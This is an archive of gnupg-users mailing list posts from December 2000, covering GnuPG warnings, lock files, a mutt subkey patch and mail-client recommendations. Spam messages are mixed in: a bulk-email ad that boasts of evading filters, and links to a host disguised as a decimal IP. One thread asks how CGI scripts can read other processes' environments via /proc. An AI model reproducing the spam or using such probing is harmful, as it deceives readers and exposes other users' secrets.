Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Wed, 6 Dec 2000 09:05:42 +0100 (CET) Subject: Depreciated algorithm In-Reply-To: <20001206132427.A3135@interact.net.au> References: <20001206132427.A3135@interact.net.au> Message-ID: <14893.62294.740991.101852@barber.fmi.uni-passau.de> >>>"D" == David writes: D> Hi just wondering why I get: D> gpg: ELG-E/RIJNDAEL encrypted D> gpg: this cipher algorithm is depreciated; please use a more standard one! D> This only occurs when people use my key to encrypt... I can stop it D> from happening if I use --cipher-algo BLOWFISH. You are using 1.0.4 that wrongly issues this warning. Just ignore it or search for a patch in the ML archive. The next release will fix this. Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From gadicath@yahoo.com Wed Dec 6 08:11:38 2000 From: gadicath@yahoo.com (David) Date: Wed, 6 Dec 2000 19:11:38 +1100 Subject: Depreciated algorithm In-Reply-To: <14893.62294.740991.101852@barber.fmi.uni-passau.de>; from Nils@InfoSun.FMI.Uni-Passau.De on Wed, Dec 06, 2000 at 09:05:42AM +0100 References: <20001206132427.A3135@interact.net.au> <14893.62294.740991.101852@barber.fmi.uni-passau.de> Message-ID: <20001206191137.A9857@interact.net.au> Thanks David -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bn2bn1@yahoo.com Tue Dec 5 10:07:27 2000 From: bn2bn1@yahoo.com (bn2bn1@yahoo.com) Date: 05 Dec 00 10:07:27 AM Subject: . Message-ID: The Internet's Finest and Most Reliable Bulk Email Provider! Since 1996, TechData has provided bulk email service to thousands of well-satisfied customers. We offer the most competitive prices in the industry, made possible by our high percentage of repeat business. We have the most advanced, direct email technology, employed by only a knowledgeable few in the world. Our expert programmers have made it possible for us to penetrate any email blocking filter in use. We have over 120 million active email addresses, increasing our list at the rate of half a million to one million a month. We will put your product or service instantly and directly into the hands of millions of prospects! You will have instant, guaranteed results, something no other form of marketing can claim. Our turn around time is a remarkable 24 hours. Our email addresses are sorted by country, state and target. Your marketing campaign will speed with pinpoint accuracy to your desired audience! Your message can be presented in any language you wish, as plain text if you desire simplicity, or in html with color and graphics. Call us for a free consultation at (323)- 851- 8386 [U.S.A.]. We are open 24 hours a day, 7 days a week. No one understands the global market like we do. For a limited time, take advantage of our holiday special -- two million general U.S. emails for just $450 per million! We include, at no cost, a bullet proof email address for 30 days, a $400 value! BULK EMAIL PRICES 500,000........................$375 750,000........................$562 1,200,000........................$720 1,600,000.................. ...$960 3,000,000......................$1,500 3,000,000+ ...................PLEASE CALL FOR A QUOTE Resellers welcome. We accept Visa, MasterCard and check by FAX. DON'T WAIT! LET TECHDATA BE YOUR PARTNER!! Under Bill s.1618 TITLE III passed by the 105th U.S. Congress this letter is not considered "spam" as long as we include: 1) contact information and, 2) the way to be removed from future mailings (see below).To Remove Yourself From This List: reply to this email with the email address that you would like removed and the word REMOVE in the subject heading. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 10:32:44 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 10:32:44 +0000 Subject: Depreciated algorithm In-Reply-To: <14893.62294.740991.101852@barber.fmi.uni-passau.de>; from Nils@infosun.fmi.uni-passau.de on Wed, Dec 06, 2000 at 09:05:42AM +0100 References: <20001206132427.A3135@interact.net.au> <14893.62294.740991.101852@barber.fmi.uni-passau.de> Message-ID: <20001206103244.A4724@nmrc.ie> > You are using 1.0.4 that wrongly issues this warning. Just ignore it or > search for a patch in the ML archive. The next release will fix this. I hope the next release also fixes the speling ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dgc@uchicago.edu Wed Dec 6 11:37:54 2000 From: dgc@uchicago.edu (David Champion) Date: Wed, 6 Dec 2000 05:37:54 -0600 Subject: Depreciated algorithm In-Reply-To: <20001206103244.A4724@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 10:32:44AM +0000 References: <20001206132427.A3135@interact.net.au> <14893.62294.740991.101852@barber.fmi.uni-passau.de> <20001206103244.A4724@nmrc.ie> Message-ID: <20001206053754.M1701@smack.uchicago.edu> On 2000.12.06, in <20001206103244.A4724@nmrc.ie>, "Lars Hecking" wrote: > > > You are using 1.0.4 that wrongly issues this warning. Just ignore it or > > search for a patch in the ML archive. The next release will fix this. > > I hope the next release also fixes the speling ;-) I'm glad I'm not the only one with a deprecated peeve. I appreciate the support. The distinction has depreciated quite a lot over recent years, but I apprecate that this improves with some exposure. :) -- -D. dgc@uchicago.edu NSIT University of Chicago -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From adler@bnl.gov Wed Dec 6 12:36:53 2000 From: adler@bnl.gov (Stephen Adler) Date: Wed, 6 Dec 2000 12:36:53 +0000 Subject: openPG aware gui mail clients Message-ID: <1001206123653.ZM11048@ssadler.phy.bnl.gov> Can someone recomend an openPG gui mail client? Thanks. Steve. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Wed Dec 6 13:01:32 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Wed, 6 Dec 2000 14:01:32 +0100 Subject: openPG aware gui mail clients In-Reply-To: <1001206123653.ZM11048@ssadler.phy.bnl.gov> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> Message-ID: <00120614013202.31997@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 6. December 2000 13:36, Stephen Adler wrote: > Can someone recomend an openPG gui mail client? Try KMail (from KDE 2.0(.1)). Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LjitqUQWN/hplRsRAmJxAJ9cN1CM8o3XWlXMbSjEYdjC1JaQLgCdGJxK MYuRy2/LaD3igV0HxVWCpH8= =vWGm -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 6 13:24:54 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 06 Dec 2000 13:24:54 GMT Subject: GnuPG plug-in for Pegasus (Windows) Message-ID: <20001206132214.335A.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I remember seeing a URL for a GnuPG plug-in for the freeware Pegasus MUA under Windows, but I can't locate it now. Has anybody got any info. on this? Graham reply to: graham@todd276.worldonline.co.uk -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: Please use my PGP Key ID: 0x99DB10BD iD8DBQE6Lj4XtwKLKus4nE4RAntpAJ468TMYuPFfyHYSw+ttZ6zTiQiw/ACgo65J 74vAOyyNfXlMfgOfTvjpJ+KIPwMFATouPhe3Aosq6zicThECe2kAoKbvDekStfgU HUxqpqzXEKBBdmjqAKCS/mU3+nxmyUD0AfaqSoDsTvfyXw== =qNTC -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Wed Dec 6 17:00:06 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Wed, 6 Dec 2000 09:00:06 -0800 Subject: Fw: possible security hole Message-ID: <000d01c05fa5$fd26e0c0$01a800c0@derekvok> ----- Original Message ----- From: "Derek Vokey" To: "Florian Weimer" Sent: Wednesday, December 06, 2000 8:58 AM Subject: Re: possible security hole > > > > There is no telnet access or any other command line access to anyone > other > > > than root on this server. Is there a way to examine the environment of > the > > > shell process strictly through cgi? > > What does "strictly through cgi" mean? If you allow uploading > > arbitrary CGI programs by users, that's almost equivalent to shell > > access and certainly sufficient for reading the environment of other > > processes, at least on Linux (where you can read /proc) and some other > > systems (where you can invoke 'ps e'). > > yes they can upload arbitrary cgi and invoke ps -e via exec (and I apologize > for my ignorance here) but please explain how to read the environment of a > process that has already occured or sleeping. If i try "more > /proc/'mypid'/environ I get permission denied. > > Hasn't the process already passed by the time someone tries to access it or > does it remain in memory. Is the time delay not a measure of protection? If > not, would it not be possible to unset($sensitiveinfo) so the the script > terminates with an invalid value for it? (I guess I don't really understand) > I have been able to see the command line of the script that I am currently > executing with ps but not of past ones. > > Please understand that I am not being argumentative - I really need to know. > Could you please share some commands on how to do this? > > > Eh, your quoting style is strange. > > My first mailing list - I'm working on it. > > Thanks > Derek > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Wed Dec 6 15:33:48 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Wed, 6 Dec 2000 16:33:48 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <20001205185236.G20381@gnupg.de> References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> <00120518145405.18426@atlas> <20001205185236.G20381@gnupg.de> Message-ID: <00120610114507.18426@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tuesday, 5. December 2000 18:52, Werner Koch wrote: > On Tue, 5 Dec 2000, Ingo Kloecker wrote: > > "-----BEGIN PGP SIGNED MESSAGE-----\n\n" + unsigned_message + "\n" > > + detached_signature > > Probably KMail did not generate the detached_signature in textmode, > whcih is required. The detached_signature was generated via 'pgps -batf', where 't' is textmode and 'a' ASCII armor. So it should be generated in textmode. But as you already said PGP 5.0i is really buggy. If a mail (or something else) you want to sign contains 8-bit characters PGP 5.0i always generates a type 0x00 signature (a signature of a binary document). Therefore GnuPG can't handle it correctly (and it doesn't have to). > > Why do PGP 5.0i (under Linux), PGP 6.5.8 (under Linux and Windows) > > and > > PGP 5.0i is really buggy - don't use it. I don't use it. The problem is that there are other people who use it. I just want to check their signatures. But this seems to be not possible. I'll try to convince these people to switch to GnuPG (or PGP 6). Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LlxcqUQWN/hplRsRAhAgAKDCctuxtZIVMD5FQkRBuIuLVSdIugCgpzw1 bllzol8zIsvUBRxzVl2oK4o= =xszu -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From afx@atsec.com Wed Dec 6 16:19:01 2000 From: afx@atsec.com (Andreas Siegert) Date: Wed, 6 Dec 2000 17:19:01 +0100 Subject: waiting for lock... Message-ID: <20001206171901.A3932@cray.muc.atsec.de> Hi, what would that mean: $ gpg --no-verbose --batch --with-colons --list-keys 2CAE19B6 gpg: waiting for lock (hold by 1407 - probably dead) ... gpg: waiting for lock (hold by 1407 - probably dead) ... gpg: waiting for lock (hold by 1407 - probably dead) ... gpg 1.0.4 on a SuSE 6.4 system. It prevents mutt (1.2) from finding keys. thx afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 16:24:17 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 16:24:17 +0000 Subject: waiting for lock... In-Reply-To: <20001206171901.A3932@cray.muc.atsec.de>; from afx@atsec.com on Wed, Dec 06, 2000 at 05:19:01PM +0100 References: <20001206171901.A3932@cray.muc.atsec.de> Message-ID: <20001206162417.A1388@nmrc.ie> Hi Andreas :) > what would that mean: > > $ gpg --no-verbose --batch --with-colons --list-keys 2CAE19B6 > gpg: waiting for lock (hold by 1407 - probably dead) ... > gpg: waiting for lock (hold by 1407 - probably dead) ... > gpg: waiting for lock (hold by 1407 - probably dead) ... Just go into ~/.gnupg and delete all .#* files. They must have been left behind when the program exited abnormally. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 17:44:09 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 17:44:09 +0000 Subject: GPG signing problem Message-ID: <20001206174409.A1875@nmrc.ie> Dunno if this is a mutt or gpg problem ... When I'm trying to "sign as" with my DSA keys, I get a list of keys containing my DSA sub-key, but not the public key. I updated gpg.rc to from mutt-cvs, but the problem persists. If I manually enter the correct key id, I am thrown back to the "Sign as:" prompt. mutt-1.3.12 gpg-1.0.4 with Werner's latest patch for signature verification. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 19:06:43 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 19:06:43 +0000 Subject: GPG signing problem In-Reply-To: <20001206174409.A1875@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 05:44:09PM +0000 References: <20001206174409.A1875@nmrc.ie> Message-ID: <20001206190643.A8078@nmrc.ie> > Dunno if this is a mutt or gpg problem ... Definitely a mutt problem. It was introduced between 1.3.11 and 1.3.12. | 6.3.101. pgp_ignore_subkeys | | Type: boolean | Default: yes | | Setting this variable will cause Mutt to ignore OpenPGP subkeys. | Instead, the principal key will inherit the subkeys' capabilities. | Unset this if you want to play interesting key selection games. Either the documentation is wrong, or my understanding of this option is wrong. Or it's a bug :) The default setting causes mutt to ignore the "real" key and choose the *wrong* key (subkey). | 1 + 1024/0x9186116D DSA es Lars Hecking | 2 + 1024/0xFB6F7CC9 RSA es Lars Hecking If I unset pgp_ignore_subkeys, it works as before. | 1 + 1024/0x83AC334A DSA -s Lars Hecking | 2 + 1024/0x9186116D ElG e- Lars Hecking | 3 + 1024/0xFB6F7CC9 RSA es Lars Hecking That comment about "interesting key selection games" seems blatant nonsense to me. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From awn@bcs.zp.ua Wed Dec 6 19:07:43 2000 From: awn@bcs.zp.ua (Andrew Nosenko) Date: Wed, 6 Dec 2000 21:07:43 +0200 Subject: GPG signing problem In-Reply-To: <20001206174409.A1875@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 05:44:09PM +0000 References: <20001206174409.A1875@nmrc.ie> Message-ID: <20001206210743.B2133@bcs.zp.ua> Lars Hecking wrote: : : Dunno if this is a mutt or gpg problem ... : : When I'm trying to "sign as" with my DSA keys, I get a list of keys : containing my DSA sub-key, but not the public key. I updated gpg.rc All correct. You should sign by your private key => mutt list your private keys. Your private key need for verification, not for signing. -- Andrew W. Nosenko (awn@bcs.zp.ua) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From roessler@does-not-exist.org Wed Dec 6 20:36:12 2000 From: roessler@does-not-exist.org (Thomas Roessler) Date: Wed, 6 Dec 2000 21:36:12 +0100 Subject: GPG signing problem In-Reply-To: <20001206190643.A8078@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 07:06:43PM +0000 References: <20001206174409.A1875@nmrc.ie> <20001206190643.A8078@nmrc.ie> Message-ID: <20001206213612.A22981@sobolev.does-not-exist.org> --QTprm0S8XgL7H0Dt Content-Type: multipart/mixed; boundary="azLHFNyN32YCQGCU" Content-Disposition: inline --azLHFNyN32YCQGCU Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2000-12-06 19:06:43 +0000, Lars Hecking wrote: > The default setting causes mutt to ignore the "real" key and choose > the *wrong* key (subkey). ups. Please try the attached patch. With respect to that notice on "interesting key selection games", you should in theory be able to use subkeys when you select them. Most likely, however, I should really make sure that I didn't add a pgp_principal_key() function call or two in the wrong places. --=20 Thomas Roessler --azLHFNyN32YCQGCU Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="patch-1.3.12.tlr.pgpkeyid.1" Content-Transfer-Encoding: quoted-printable Index: gnupgparse.c =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D RCS file: /home/roessler/cvsroot/mutt/gnupgparse.c,v retrieving revision 2.16 diff -u -r2.16 gnupgparse.c --- gnupgparse.c 2000/11/13 22:19:57 2.16 +++ gnupgparse.c 2000/12/06 20:29:03 @@ -216,8 +216,8 @@ { dprint (2, (debugfile, "key id: %s\n", p)); =09 - /* We really should do a check here */ - mutt_str_replace (&k->keyid, p); + if (!(*is_subkey && option (OPTPGPIGNORESUB))) + mutt_str_replace (&k->keyid, p); break; =20 } --azLHFNyN32YCQGCU-- --QTprm0S8XgL7H0Dt Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: 2.6.3in iQEVAwUBOi6jO9ImKUTOasbBAQHMFQgApgKfj1hoWKkPmZWcgwAv9+1bJzhRBrwl lMczR/2JJFVgcJ6VZKqYuDGwDrheGihJziKmbgpcW8aXVh1bJjxPClML8tdGM9w1 vez82iRpu+WWuj6GaWD11qjgXStFeAUUo2HeEVc/48YQojm/yPQJSGbnGlQQ2dV3 r+y5RAHWK5oK1vs1P/cPeirQm15cCVX4UmuYwUAJRtc/0ocAt60oIeMOzWe+hHks zSXpKOsQD8JS4QQMwRrv0Bit9H5+BM/WSHA+dIfh3tE979yCP2nRRO++k6mF0kDv tH98JWDi5zAi3k+TAhoATmC/RC29WMmngqHhLbhmvdNGIRhKwKBtzQ== =RGIB -----END PGP SIGNATURE----- --QTprm0S8XgL7H0Dt-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sen_ml@eccosys.com Thu Dec 7 01:15:39 2000 From: sen_ml@eccosys.com (sen_ml@eccosys.com) Date: Thu, 07 Dec 2000 10:15:39 +0900 (JST) Subject: openPG aware gui mail clients In-Reply-To: <1001206123653.ZM11048@ssadler.phy.bnl.gov> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> Message-ID: <20001207.101539.59676982.sen_ml@eccosys.com> From: "Stephen Adler" Subject: openPG aware gui mail clients Date: Wed, 6 Dec 2000 12:36:53 +0000 > Can someone recomend an openPG gui mail client? if you are a emacs user, there is Mew: http://www.mew.org/ also, with the help of members of the pgp-users@cryptorights.org mailing list, a while back i started collecting info about which mail clients support various versions of pgp (gnupg included), whether they support pgp/mime, etc. some members of the list were kind enough to host it. one such location is: http://rmarq.pair.com/pgp/mail-clients-pgp.html if anyone has any additions or changes that think should be made, i'm willing to incorporate them. the preferred way is via the aforementioned pgp-users list as reports will be seen by more than one pair of eyeballs ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From carlstephen33@writeme.com Thu Dec 7 03:37:09 2000 From: carlstephen33@writeme.com (carlstephen33@writeme.com) Date: Thu, 7 Dec 2000 11:37:09 +0800 (CST) Subject: [#1] Message-ID: <200012070337.LAA45434@ns1.capita.org> NEW AND EXCITING!! http://3506561041/iindex22/legal.html This Is A Weekly Mail List. To Be Removed Permanently Email permenentremoval@excite.com with "remove" somewhere in the subject line. PERMANENT REMOVAL!! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From carlstephen33@writeme.com Thu Dec 7 03:47:01 2000 From: carlstephen33@writeme.com (carlstephen33@writeme.com) Date: Thu, 7 Dec 2000 11:47:01 +0800 (CST) Subject: [#2] Message-ID: <200012070347.LAA52886@ns1.capita.org> HERE IS THE NEW SITE!! Flash Technology!! this is the future!! http://3506561041/iindex22/newflash.htm This Is A Weekly Mail List. To Be Removed Permanently Email permenentremoval@excite.com with "remove" somewhere in the subject line. PERMANENT REMOVAL!! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From afx@atsec.com Thu Dec 7 07:34:12 2000 From: afx@atsec.com (Andreas Siegert) Date: Thu, 7 Dec 2000 08:34:12 +0100 Subject: waiting for lock... In-Reply-To: <20001206162417.A1388@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 04:32:53PM +0000 References: <20001206171901.A3932@cray.muc.atsec.de> <20001206162417.A1388@nmrc.ie> Message-ID: <20001207083412.A567@cray.atsec.com> Quoting Lars Hecking (lhecking@nmrc.ie) on Wed, Dec 06, 2000 at 04:32:53PM +0000: > > Hi Andreas :) > > > what would that mean: > > > > $ gpg --no-verbose --batch --with-colons --list-keys 2CAE19B6 > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > Just go into ~/.gnupg and delete all .#* files. They must have been > left behind when the program exited abnormally. Thanks! It was not the .#l* file but trustdb.gpg.lock that caused it! The 1407 was putting me on the wrong trck, I was thinking PID here... cheers afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 7 08:22:31 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 7 Dec 2000 09:22:31 +0100 Subject: waiting for lock... In-Reply-To: <20001207083412.A567@cray.atsec.com>; from afx@atsec.com on Thu, Dec 07, 2000 at 08:34:12AM +0100 References: <20001206171901.A3932@cray.muc.atsec.de> <20001206162417.A1388@nmrc.ie> <20001207083412.A567@cray.atsec.com> Message-ID: <20001207092230.J21969@gnupg.de> On Thu, 7 Dec 2000, Andreas Siegert wrote: > > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > > > Just go into ~/.gnupg and delete all .#* files. They must have been > > left behind when the program exited abnormally. > > Thanks! It was not the .#l* file but trustdb.gpg.lock that caused it! > The 1407 was putting me on the wrong trck, I was thinking PID here... It is a PID, but one from a terminated process. The "probably dead" is needed due to the fact that the directory may be NFS mounted and the pid alone is not sufficient to check whether the process is really dead. I should add the hostname to the lockfile to be able to remove a stale lockfile. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bsokolow@lucent.com Thu Dec 7 10:27:53 2000 From: bsokolow@lucent.com (Bernd Sokolowsky) Date: 07 Dec 2000 11:27:53 +0100 Subject: geam Message-ID: Hi, gibt's irgendwo ein downladbares Sourcepaket fuer GEAM? Vorzugsweise die Version, die sich seit "6 Monaten im Produktionseinsatz" befindet. Oder gibt's GEAM nur per CVS? Cheers, Bernd. -- Bernd Sokolowky @ the job -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bsokolow@lucent.com Thu Dec 7 10:54:27 2000 From: bsokolow@lucent.com (Bernd Sokolowsky) Date: 07 Dec 2000 11:54:27 +0100 Subject: geam (nochmal) Message-ID: Hi, > Oder gibt's GEAM nur per CVS? Und was die CVS Version angeht, wie ist denn generell so der Status dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht einmal das "configure" Skript beiliegt. Ich gehe mal davon aus, dass ich mir das selbst zusammenbauen muss ? Cheers, Bernd. -- Bernd Sokolowky @ the job -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 7 11:08:03 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 7 Dec 2000 12:08:03 +0100 Subject: geam (nochmal) In-Reply-To: ; from bsokolow@lucent.com on Thu, Dec 07, 2000 at 11:54:27AM +0100 References: Message-ID: <20001207120803.N21969@gnupg.de> On Thu, 7 Dec 2000, Bernd Sokolowsky wrote: > dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht > einmal das "configure" Skript beiliegt. Das wird per autoconf gebaut: $ aclocal ; autoheader; automake; autoconf Ich habe momentan keine Zeit ein Release zu machen. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ra@letras.de Thu Dec 7 11:44:42 2000 From: ra@letras.de (Ralph Angenendt) Date: Thu, 7 Dec 2000 12:44:42 +0100 Subject: geam (nochmal) In-Reply-To: ; from bsokolow@lucent.com on Thu, Dec 07, 2000 at 11:54:27AM +0100 References: Message-ID: <20001207124442.A30042@camioneta.letras.de> --RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Bernd Sokolowsky wrote: > Hi, >=20 > > Oder gibt's GEAM nur per CVS? >=20 > Und was die CVS Version angeht, wie ist denn generell so der Status > dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht > einmal das "configure" Skript beiliegt. >=20 > Ich gehe mal davon aus, dass ich mir das selbst zusammenbauen muss ? Errm, Bernd - english seems to be the preferred language in this list (rough translation): Hi, is GEAM only available via CVS? And while I'm at it: What is the general status of GEAM? One of the first things that came to my attention was the missing configure script. Am I right to presume that I have to build this package manually? Cheers, Ralph --RnlQjJ0d97Da+TV1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6L3gqjB6yu/0L7eURAjxNAJ9pr14VEglbtreChczC6d6YRdBbWACfTCI+ Mw4peNeTeWy98kKKs/QOOi0= =7reT -----END PGP SIGNATURE----- --RnlQjJ0d97Da+TV1-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bsokolow@lucent.com Thu Dec 7 11:57:56 2000 From: bsokolow@lucent.com (Bernd Sokolowsky) Date: 07 Dec 2000 12:57:56 +0100 Subject: geam (nochmal) In-Reply-To: Bernd Sokolowsky's message of "07 Dec 2000 11:54:27 +0100" References: Message-ID: Sorry for writing in german, here comes the translation: I asked if some downloadable packages for GEAM exist. Preferably something that is already in production use somewhere. Werner replied that he is currently not packaging this due to time shortage. Regarding the CVS sources I asked about how to build GEAM (there is no "configure" tree in the CVS tree). Werner's reply was: "aclocal ; autoheader; automake; autoconf". Since some of these tools are not available here on the HP-UX box, I'll try this evening at home on my Linux box. Cheers, Bernd. -- Bernd Sokolowky @ the job -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 7 12:08:58 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 7 Dec 2000 13:08:58 +0100 Subject: geam (once more) In-Reply-To: <20001207120803.N21969@gnupg.de>; from wk@gnupg.org on Thu, Dec 07, 2000 at 12:08:03PM +0100 References: <20001207120803.N21969@gnupg.de> Message-ID: <20001207130858.O21969@gnupg.de> On Thu, 7 Dec 2000, Werner Koch wrote: > On Thu, 7 Dec 2000, Bernd Sokolowsky wrote: > > > dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht > > einmal das "configure" Skript beiliegt. [Ooops too] You have to use autoconf to build configure.in: $ aclocal ; autoheader; automake; autoconf Currently I have no time to do a regular release. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sascha@meta-x.de Fri Dec 8 01:36:40 2000 From: sascha@meta-x.de (Sascha =?iso-8859-1?q?L=FCdecke?=) Date: 08 Dec 2000 02:36:40 +0100 Subject: openPG aware gui mail clients In-Reply-To: <20001207.101539.59676982.sen_ml@eccosys.com> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> Message-ID: The CVS gnus (version 5.8.8) has also a quite good integration of PGP and GPG. It is able to process S/MIME, too, though I haven't testet this yet. http://www.gnus.org/distribution.html Regards, Sascha -- I never miss a chance to have sex or appear on television -Gore Vidal- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 08:45:09 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 09:45:09 +0100 Subject: openPG aware gui mail clients In-Reply-To: ; from sascha@meta-x.de on Fri, Dec 08, 2000 at 02:36:40AM +0100 References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> Message-ID: <20001208094509.D21969@gnupg.de> On Fri, 8 Dec 2000, Sascha Lüdecke wrote: > The CVS gnus (version 5.8.8) has also a quite good integration of PGP > and GPG. It is able to process S/MIME, too, though I haven't 